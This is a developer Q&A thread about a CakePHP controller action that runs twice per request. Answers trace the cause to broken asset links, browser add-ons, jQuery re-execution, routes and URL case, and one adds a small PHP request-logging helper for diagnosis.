//when generating your captcha display as done on your lines 295, 296, 297
include_once(INCLUDES_FOLDER."recaptcha-php-1.11/recaptchalib.php");
echo recaptcha_get_html(RECAPTCHA_PUBLIC_KEY,$recaptcha_error);
Hope this helps (even if a little) :)
Cheers

CakePHP: Action runs twice, for no good reason

I have a strange problem with my cake (cake_1.2.0.7296-rc2).
My start()-action runs twice, under certain circumstances, even though only one request is made.
The triggers seem to be:
- loading an object like: $this->Questionnaire->read(null, $questionnaire_id);
- accessing $this->data
If I disable the call to loadAdvertisement() from the start()-action, this does not happen.
If I disable the two calls inside loadAdvertisement():
$questionnaire = $this->Questionnaire->read(null, $questionnaire_id);
$question = $this->Questionnaire->Question->read(null, $question_id);
... then it doesn't happen either.
Why?
See my code below, the Controller is "questionnaires_controller".
function checkValidQuestionnaire($id)
{
    $this->layout = 'questionnaire_frontend_layout';
    if (!$id)
    {
        $id = $this->Session->read('Questionnaire.id');
    }
    if ($id)
    {
        $this->data = $this->Questionnaire->read(null, $id);
        //echo "from ".$questionnaire['Questionnaire']['validFrom']." ".date("y.m.d");
        //echo " - to ".$questionnaire['Questionnaire']['validTo']." ".date("y.m.d");
        if ($this->data['Questionnaire']['isPublished'] != 1
            //|| $this->data['Questionnaire']['validTo'] < date("y.m.d")
            //|| $this->data['Questionnaire']['validTo'] < date("y.m.d")
        )
        {
            $id = 0;
            $this->flash(__('Ungültiges Quiz. Weiter zum Archiv...', true), array('action'=>'archive'));
        }
    }
    else
    {
        $this->flash(__('Invalid Questionnaire', true), array('action'=>'intro'));
    }
    return $id;
}
function start($id = null) {
    $this->log("start");
    $id = $this->checkValidQuestionnaire($id);
    //$questionnaire = $this->Questionnaire->read(null, $id);
    $this->set('questionnaire', $this->data);
    // reset flow-controlling session vars
    $this->Session->write('Questionnaire',array('id' => $id));
    $this->Session->write('Questionnaire'.$id.'currQuestion', null);
    $this->Session->write('Questionnaire'.$id.'lastAnsweredQuestion', null);
    $this->Session->write('Questionnaire'.$id.'correctAnswersNum', null);
    $this->loadAdvertisement($id, 0);
    $this->Session->write('Questionnaire'.$id.'previewMode', $this->params['named']['preview_mode']);
    if (!$this->Session->read('Questionnaire'.$id.'previewMode'))
    {
        $questionnaire['Questionnaire']['participiantStartCount']++;
        $this->Questionnaire->save($questionnaire);
    }
}
function loadAdvertisement($questionnaire_id, $question_id)
{
    //$questionnaire = array();
    $questionnaire = $this->Questionnaire->read(null, $questionnaire_id);
    //$question = array();
    $question = $this->Questionnaire->Question->read(null, $question_id);
    if (isset($question['Question']['advertisement_id']) && $question['Question']['advertisement_id'] > 0)
    {
        $this->set('advertisement', $this->Questionnaire->Question->Advertisement->read(null, $question['Question']['advertisement_id']));
    }
    else if (isset($questionnaire['Questionnaire']['advertisement_id']) && $questionnaire['Questionnaire']['advertisement_id'] > 0)
    {
        $this->set('advertisement', $this->Questionnaire->Question->Advertisement->read(null, $questionnaire['Questionnaire']['advertisement_id']));
    }
}
I really don't understand this... I don't think it's meant to be this way.
Any help would be greatly appreciated! :)
Regards,
Stu
Check your layout for non-existent links, for example a misconfigured link to favicon.ico will cause the controller action to be triggered for a second time. Make sure favicon.ico points towards the webroot rather than the local directory, or else requests will be generated for /controller/action/favicon.ico rather than /favicon.ico - and thus trigger your action.
This can also happen with images, stylesheets and javascript includes.
To counter check the $id is an int, then check to ensure $id exists as a primary key in the database before progressing on to any functionality.
For me it was a JS issue.
Take care with jQuery's wrap function, which re-executes the JS in the wrapped content!
You might want to try and find out where it comes from using the debug_print_backtrace() function. (http://nl.php.net/manual/en/function.debug-print-backtrace.php)
Had the same problem, with a certain action randomly running 2-3 times. I tracked down two causes:
The Firefox add-on YSlow was set to load automatically from its Preferences, causing pages to reload when using F5 (not when loading the page from the browser's address bar and pressing Enter).
I had a faulty css style declaration within the options of a $html->link(); in some cases it would end up as background-image: url('');, which caused a rerun also. Setting the style for the link to background-image: none; when no image was available fixed things for me.
Hope this helps. I know this is quite an old post, but as it comes up pretty high in Google when searching for this problem, I thought it might help others by still posting.
Good luck
Jeroen den Haan
I had a problem like this last week.
Two possible reasons
Faulty routes (DO check your routes configuration)
Faulty AppController. I add loads of stuff into AppController, especially to beforeFilter() and beforeRender() so you might want to check those out also.
One more thing: where are you setting the Questionnaire.id in your Session? Perhaps that's the problem?
Yes, it occurs when there is a broken link in the web page. Each browser deals with it differently (Firefox calls it 2x). I tested it; there is no difference between CakePHP v1.3 and v2.2.1. To find out who the culprit is, add this line to the code, and then open the second generated file in your www folder:
file_put_contents("log-" . date("His") . ".txt", $this->params['pass'] ); // CakePHP v1.3; "His" = hour, minute, second
file_put_contents("log-" . date("His") . ".txt", $this->request['pass'] ); //CakePHP v2.2.1
PS: First I blamed jQuery for it. But in the end it was a forgotten image for AJAX loading in a 3rd-party script.
I had the same problem in Chrome; I disabled my 'HTML Validator' add-on, which was loading the page twice.
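An added example along the same lines (not from any answer here; log_request() is this example's own name, and TMP is CakePHP's temp-directory constant): appending one line per request with the URI, Referer and User-Agent makes the second hit stand out immediately, because a broken favicon, image or script link shows up as a request for a different URI (such as /controller/action/favicon.ico) with the page itself as Referer, while a browser add-on reload shows the same URI twice with the same Referer.

```php
<?php
// Added example: one log line per request, enough to tell apart a stray
// asset URL from a genuine double request. Call it first thing in the action.

function log_request(string $file, ?array $server = null): string
{
    $server = $server ?? $_SERVER;
    $line = sprintf(
        "%s %s %s uri=%s referer=%s ua=%s\n",
        date('c'),
        $server['REMOTE_ADDR'] ?? '-',
        $server['REQUEST_METHOD'] ?? '-',
        $server['REQUEST_URI'] ?? '-',
        $server['HTTP_REFERER'] ?? '-',
        $server['HTTP_USER_AGENT'] ?? '-'
    );
    // LOCK_EX keeps two near-simultaneous requests from interleaving their lines.
    file_put_contents($file, $line, FILE_APPEND | LOCK_EX);
    return $line;
}

// In the controller action, e.g. at the top of start():
//     log_request(TMP . 'requests.log');
```

Two lines with different uri= values point at a bad link in the layout; two identical lines a few milliseconds apart point at the client (add-on, prefetch, or a script re-executed by jQuery).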
I was having a similar issue; the problem seemed to be isolated to case-insensitivity on the endpoint.
i.e.:
http://server/Questionnaires/loadAvertisement vs.
http://server/questionnaires/loadavertisement
When calling the proper-cased endpoint, the method ran once, whereas the lower-cased one ran twice. The problem was occurring sporadically, happening on one controller but not on another (essentially the same logic, no additional components etc.). I couldn't confirm it, but I believe the fault to be the browser's, not CakePHP's.
My workaround was ensuring that every endpoint link was proper-cased. To go even further, I added common case variants to the Route's configuration:
app/config/routes.php
<?php
// other routes..
$instructions = ['controller'=>'Questionnaires','action'=>'loadAvertisement'];
Router::connect('/questionnaires/loadavertisement', $instructions);
Router::connect('/QUESTIONNARIES/LOADADVERTISEMENT', $instructions);
// ..etc
If you miss <something>, for example a View, Cake will trigger a missing <something> error and it will try to render its Error View. Therefore, AppController will be called twice. If you resolve the missing issue, AppController is called once.
